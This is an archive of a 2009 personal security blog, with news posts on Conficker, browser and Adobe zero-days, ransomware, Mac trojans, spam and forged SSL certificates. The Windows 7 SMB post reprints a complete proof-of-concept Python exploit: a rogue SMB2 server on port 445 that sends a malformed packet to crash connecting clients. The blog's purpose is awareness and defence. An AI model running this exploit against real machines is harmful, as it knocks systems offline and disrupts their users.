Monday, 30 November 2009

Conficker attacks major Indian admission test

According to some major reports  the conficker attack caused a huge chaos and resulted in cancelling India's major MBA admission test CAT (Common Admission Test).
The computers are said to have been infected with Conficker and
W32/Nimda viruses.

The test centers were shut because of infection and it caused huge disruptions to number of students attending tests. This event clearly shows lack of cyber security awareness on the IT team . Since Conficker exploits MS08-067, it clearly shows the affected systems were not updated with latest Microsoft patches.
This incident is a clear example of how ignoring cyber security can affect established infrastructures.

Monday, 23 November 2009

IE 7 "getElementsByTagName()" Vulnerability

Symantec have confirmed IE zero day exploit for versions 6&7. This attack can be used to compromise the vulnerable system. The issue is in  Microsoft HTML Viewer (mshtml.dll) when trying to retrieve certain CSS could crash the browser or execute some random shell code to give system access to the attacker.



The exploit code can be found here . The workaround for this vulnerability is to update your Microsoft Internet explorer to version 8 or follow this mitigation technique

Sunday, 15 November 2009

Zero day Vulnerability in Windows 7

Its not a very long time since Windows 7 Operating system is released, we already have a Microsoft confirmed zero day vulnerability.
This was first reported by a security researcher. The bug is in SMB (Server Message Block) protocol used for network file and print sharing services. When exploited the vulnerability can result in total lock down of the system and  requires a restart to gain a total control of the system.
Laurent Gaffie the researcher who discovered this flaw says that the exploit can be successfully launched from a compromised computer within a network or using internet explorer by building a rogue packet.

The full proof of concept exploit code is published in Full Disclosure.
***********************************************************************************
#Author: Laurent GaffiƩ
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):

        print "Who:", self.client_address
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()
 *************************************************************************************
Microsoft are yet to provide patch for this, so all users are recommended to block their TCP ports 445 and 139 unless it is really necessary.
Only Windows 7 and Windows server 2008 operating systems are affected by this.

Tuesday, 29 September 2009

Microsoft AntiVirus Tool


I blogged about intial beta release of Free Antivirus by Microsoft back in june. Now Microsoft are providing the full version of AntiVirus which can be found here.
I've haven't tried and tested it. With the release of free AV Microsoft has joined other vendors like Avira and Avast. We should look this initiative by Microsoft from the security point of view as a significant step and would suggest Microsoft to install it by default on all the PC's sold with Microsoft OS. This is because there are awful lot of users who are not bothered to install Antivirus and fall prey to malware/Botnets infecting their communities. Microsoft being a major player in the OS market will definitely help many more users install antivirus (especially in developing economies China, Brazil, India and Russia).
Hope this will have positive effect on computer security community.

Saturday, 26 September 2009

File Encryptor (Ransomware)

Virus GPCode is a ransomware. Unlike other viruses this malware encrypts all the DOC, TXT, PDF, XLS, JPG, PNG, CPP, H extensions files using standard RSA algorithm with 1024 bit key.




As this malware uses 1024 bit key, its difficult for the reverse engineers to crack this encryption( not impossible though :-) ) . Gpcode uses Public Key Cryptography where the malware encrypts all the files with public key and can only be decrypted with private key which is held by the malware author.
According above security analysis the malware after encryption changes the file extension to '._CRYPT' and deletes the original file . After encrypting all the files the malware displays the message shown in the above picture. The scammers have provided the email id and demand the user to contact them to decrypt files.

So users be careful not to click links on unsolicited messages and dodgy websites. Have great weekend .



Thursday, 27 August 2009

Malware disguised as Snow Leopard

According to this report, malware writers are Phishing users to download malware as the free newest Version of Mac OS , Snow Leopard.
The malware may change your DNS configurations and download additional malicious scripts. Users are redirected to Phishing and FakeAV ( bogus Antivirus applications) sites.
Mac users please download your latest updates only from legitimate apple site.

Sunday, 23 August 2009

Induc Virus


Induc is a File infector virus. This doesn't infect the exe's, instead it checks if Delphi(versions 4.0 -7.0) is installed on the machine.
If Delphi installation is found it copies SysConst.pas(source program,pas =pascal) to \Lib folder and overwrites its code. It renames the original %DelphiRootDir%\lib\sysconst.dcu (dcu =Delphi compiled unit, Delphi compiled code) into SysConst.bak. It now compiles the modified sysconst.pas to produce a infected copy of sysconst.dcu file and deletes the modified version of sysconst.pas file. There by infecting all the new compiled Delphi programs on this computer. [1],[2]

Thursday, 23 July 2009

Adobe Flash Zero Day

July seems to be a very busy month for Security folks and malware authors , we have already seen three zero day exploits Microsoft Activex Control , MS Office web components and Firefox3.5 . As an addition to this list we are seeing a new zero day vulnerability exploiting the Adobe flash.

This is an unpatched Adobe flash player vulnerability being exploited in the wild.
According to this report Adobe pdf reader's ability to support SWF component is misused to spread this exploit by fooling the users to open a pdf with an embedded malicious swf file(flash).

According to this analysis. A sample of the pdf malware with exploit crashes when run and drops a executable(Suchost.exe) embedded inside the pdf. It also tries to connect to a remote server by doing a dynamic ip lookup.
The dropped exe adds itself to the startup list ( programs which run on starting your computer) and further drops a malicious sys and dll file.
Unfortunately major AV vendors have a poor detection. So dear readers please don't open any untrusted pdf's or flash files.

Wednesday, 22 July 2009

Mystical Cloud


I'm talking about Cloud computing , SAAS (software as a service) , hybrid cloud etc. I was reading an article about Cloud computing. Cloud or SAAS is a software service offered over the web or public network. Best example for Cloud at the moment is Google Apps (like Google Docs).

From the security perspective Cloud Security and DLP (Data Loss/Leakage Prevention) are the latest buzz in the industry. All the vendors are investing and trying to conquer, by coming up with new products in these market. DLP by itself like cloud is very wide topic which involves cryptography.

Benefits?

There are lots of benefits in Cloud computing , users just need to have broadband rest is handled by cloud service provider. Users don't have to worry about installing different applications or maintaining it. (I would expect a day in the future where users only have a browser on their machine and rest all the services including most of the Operating system functionalities are moved to the cloud or core functionalities embedded within the browser ).

Concerns ?

Security would be the major concern because you will be fully trusting an unknown (or known but not guaranteed) service provider. You will be storing all your documents and company information trusting the infrastructure and security of the service provider. The service provider at some point may sell your data to a third party without consent or their may be a breach in their security .

Computer Security in Cloud is also a major concern, as present Malware which are in the form of Trojans , Viruses or Worms may evolve and target more browsers or use exploits in mass volume rather than targeting individual users and there could also be a botnet operating in the clouds!! .

Like every technology there are pros and cons for Cloud computing security industry should work together and plan properly to thwart any security loop holes before embracing this in both hands.

Wednesday, 8 July 2009

New MyDoom Variant

Don't be scared its not confirmed yet. Those of you who don't know what MyDoom is, there was a nasty mass mailing worm MyDoom back in 2004 . According this post they reckon that its the new variant of the MyDoom worm.
This worm is said to have caused large DDOS(distributed denial of service) attack on US and Korean websites.

Thursday, 25 June 2009

Microsoft Free AntiVirus

Microsoft have started free AV(Antivirus) service. This service is available only to few countries in the world. At the moment China, Brazil, Israel and USA are the only countries where this service is available.
Looks like microsoft are trying to conquer AV market with their free software, we should wait and see the reaction of other AV vendors.

Saturday, 6 June 2009

PhD in 10 Days

On Saturday morning when i was checking my emails i saw that my gmail spam folder was filled with loads of message.
I took a peek into some of the messages which said "Bachelor/PhD..." in 10 days and it also claims that you need not go study or go to university blah blah, what's the use of getting such a degree ? Here's the snippet of the message
--------------------------------------------------------------------------
It's now possible to earn affordable Bache1or, Master or Doctorate Degrees!

No Studies
No Attendance
No Waiting
No Examinations
No Hefty Fee

Earn a recognized UniversityDegree based on work or life experience from University within 10 days!
Get your desired degree on the basis of your Prior Knowledge and Life Experience.

1-XXX-XXXX-740 [Inside USA]
+1-XXX-XXXX-740 [Outside USA]

No Experience? No Problem!

On the basis of what you already know, you can now qualify for a degree that is accepted and recognized worldwide for as little as couple hundred.

DOES THIS SOUND LIKE YOU?

* You have more experience yet your colleague gets promoted?
* Many companies where you apply for a job don't give you a call as you lack the basic education they require?
* You struggle in relationships, as 'she' thinks you don't have a promising future?

HERE's YOUR WAY OUT:
It is now possible to earn an accredited degree on the basis of work and life experience you already have and receive your degree in just 10 days!

PLEASE CALL TODAY:
1-XXX-XXXX-740 [Inside USA]
+1-XXX-XXXX-740 [Outside USA]

Please tell us your:
a) your name
b) your Country
c) phone number with CountryCode if outside U.S.A.

We will get back to you in next working day
----------------------------------------------------------------------------------
Google spam system was very smart to block them. You can easily spot typo's and quick Google search of the telephone numbers tells you that they are premium numbers used by scammers to make money , so don't get fooled in an ambition to get fake degree.

As i further went through my emails still there were local sexy singles waiting for me, canadian doctor wooing me to buy viagra....oops nastiness of spam ,so stay away from it, don't try to open anything in your bulk/spam folder(or run any attachments) unless you are sure its from legitimate source.

Friday, 22 May 2009

Gumblar

US-CERT has warned about multistage malware exploit. Chinesedomain based malware called 'gumblar' at first stage infects website using obfuscated javascript . The websites are infected by using stolen FTP credentials.
Visitors to these infected websites are exploited for unpatched PDF and Flash vulnerabilities.
Users are therefore urged to update their software and stay updated with their Antivirus.

Thursday, 14 May 2009

Two Factor Card Authentication Technology in beta

Two Factor payment card authentication system has been successfully integrated to plastic payment card.
The EMUE developed card has got an 12 button key pad and LCD display.The keypad is used to enter pin, upon which it generates one time pass code used for authentication purposes.
We can also note there was similar system developed by RSA called SecureID.

Thursday, 7 May 2009

Bootkit, will this supersede Rootkit ?

Bootkit (or VBootkit) is kinda of rootkit that can load from boot sector. Indian security researchers released the code for the VBootkit, they claim that it can be used to compromise security on Windows Vista and Windows7. According to this VBootkit can also be potentially misused to develop boot sector viruses.
But Windows say that its not a vulnerability but a design flaw which is exploited by VBootkit and its not threat to the OS(can be circumvented using bitlocker).

Tuesday, 5 May 2009

Critical Vulnerability in Adobe 9.1

According to this post a critical vulnerability has been identified in Adobe Reader and acrobat 9.1 and earlier versions. This vulnerability could allow the attacker to take control of the system.
All users are advised to disable 'javascript' function in their adobe application.
Seeing all the recent vulnerabilities in acrobat , adobe would be wondering if they were right in providing javascript functionality in reader.

When Dot disappeared

This is a good example how small mistakes may lead to security blunders. Microsoft posted some updates related to Vista SP2 . The link in the post actually missed a dot, instead of pointing to technet.microsoft.com it pointed to technetmicrosoft.com. Though this domain was not malicious, it could've been serious damage if the domain was malicious. Microsoft rectified this immediately.

Sunday, 26 April 2009

End of Conficker on May 5th

According to this article the conficker will self destruct itself on May 5th.

Wednesday, 22 April 2009

Bogus waiter

i was too lazy to write blog these days.
If you are bored reading security jargon , here's a change ( though related to physical security ).
A man posed as a waiter and took about $186. The man walked into restaurants and diners disguised as a waiter and collected money. Still the modern day world is vulnerable to basic tricks.

Saturday, 4 April 2009

Microsoft Powerpoint vulnerability

There is a new Microsoft powerpoint vulnerability . The vulnerability is rated as critical ,this could allow remote code execution on victim's machine. I blogged about zero day excel flaw to add to that there is a new powerpoint vulnerability. Microsoft may come up with the patches, in the meantime users are alerted not to open files from untrusted sources and keep their antivirus software updated.

What is Conficker-C waiting for ?

I wrote in my previous post that conficker may be fooling around. To update that, so far we have not seen any major havoc from conficker C. Conficker authors may upload their payload at any time to one of the 50,000 domains list ( though only 500 domains are contacted per day). Security researchers are not sure when conficker would update itself( because of server side polymorphism). May be conficker authors are trying to give a surprise or waiting for security researchers and media to concentrate on different stuff !!!

Saturday, 21 March 2009

Is Conficker C trying to (April) Fool us ?

Recently i wrote about new Conficker variant.
By the time security industry were jubiliant fighting against it , there's a new variant Conficker C which is waiting to trigger itself on April 1 according to this paper. This is an excellent paper about the analysis of the Conficker C.

Notable aspect in this variant is the use of cutting edge computer technologies. Conficker C uses MD 6 algorithm ( buffer overflow exploitable version was also used in B variant), new dll patching techniques and P2P (peer to peer) protocol usage for updating binary.

Monday, 9 March 2009

New Conficker Variant

I blogged about Conficker few days back. Conficker exploits a Microsoft Vulnerability. Initially it was successful in creating massive damage to industry and infected large number of machines. AV industry initially suffered to clean this malware but were later successful in tracking its working and were able clear it up. To increase the cold war between AV and malware authors there's a new variant of Conficker. We'll have to wait and see how AV industry will respond to this.

Tuesday, 24 February 2009

Zero Day Vulnerability in Microsoft Excel

Microsoft have released an advisory about a vulnerability in Microsoft excel. This vulnerability could allow remote code execution.
Malicious excel file could be sent through email (spam) or crafted to be downloaded from a remote server. When the user executes the file there could be a arbitrary (shell code usually) code execution with the same privilege of the user.

Computer users are advised not to open any emails/pdf's (there was a recent vulnerability in adobe pdf) from untrusted sources.

Sunday, 15 February 2009

Twitter and ClickJacking

In an interesting development microblogging websiteTwitter was made to broadcast messages due to clickjacking flaw.
ClickJacking is a vulnerability in adobe product which dupes users from clicking on internet URL's. User may assume that he is clicking the google (or any other benign) link but he's redirected to money transering or Viagra pharmacy webpage.

Thursday, 5 February 2009

Parking Ticket used for Social Engineering

Bad guys are said to have come up with new social engineering trick to lure users in visiting their malicious websites.
Parking tickets with false parking violations is believed to be found on vehicles with the following message

PARKING VIOLATION This vehicle is in violation of standard parking regulations. To view pictures with information about your parking preferences, go to [website-redacted]

People visiting the websites are installed with browser helper objects (BHO) and are forced to use fake-AV softwares

Friday, 23 January 2009

New Trojan for Mac

Mac was away from malware for quite a few days. But to increase the necessity for security of Mac (or to increase the security market for mac) new mac trojan was reported. The Trojan was first reported by Intego. The Trojan was found in pirated apple iWork 09 (equivalent of microsoft windows office). This version of iWork 09 is said to contain Trojanized package called iWorkServices.pkg which is installed alongside iwork software. This package runs itself as a service and attempts to connect to a remote server. Mac users are alerted not to download this version and to update their antivirus softwares with latest virus definitions.

Saturday, 17 January 2009

"Conficker" Latest Worm in the cyber town

By the time i was writing this blog ,Conficker worm also known as 'Downadup' is spreading across very fast. According to security firm F-Secure blog post it is said to have infected 8.9 million machines.
This worm is said to exploit Microsoft windows server service vulnerability.
According to this article the worm also tries to spread by searching shared computers with weak passwords, removable drives and computers without latest security updates.
It has caused havoc to the cyber business after storm worm.The worm is said to have infected many banks and popular IT firms across the world. The AV vendors are still working hard to find disinfection and cleanup to this worm. The firms and users are advised to update themselves with latest security udpates and patches.

Friday, 2 January 2009

Forged SSL certificates

Researchers Molnar, Appelbaum, and Sotirov were able to successfully create a rogue CA (certificate authority). They picked the CA's which are still using crappy MD5 for their certificate. They were able to forge the legitimate certificate with their rogue one's as the MD5 hash values of both the certificates were same ( flaw in MD5 due to collisions).
Though this can be used by malware authors to create fake digital certificates, which is seen in recent malware attacks. They can impersonate bank websites and fool users in phishing attacks.
The solution to this problem is to use SHA instead of MD5.
Though this is a very good research work, this is not great security threat as SSL is at the browser end is only certification and there are so many legitimate websites with bad certificates. Normally people ignore those warnings displayed by the browsers.

As we know that data is often stored at endpoints rather than network, creating a rogue CA certificate is not off great security risk.
At least in 2009 we should stop using MD5 and switch to SHA....

Happy New year to all, Wishing for a secure and safe web :-)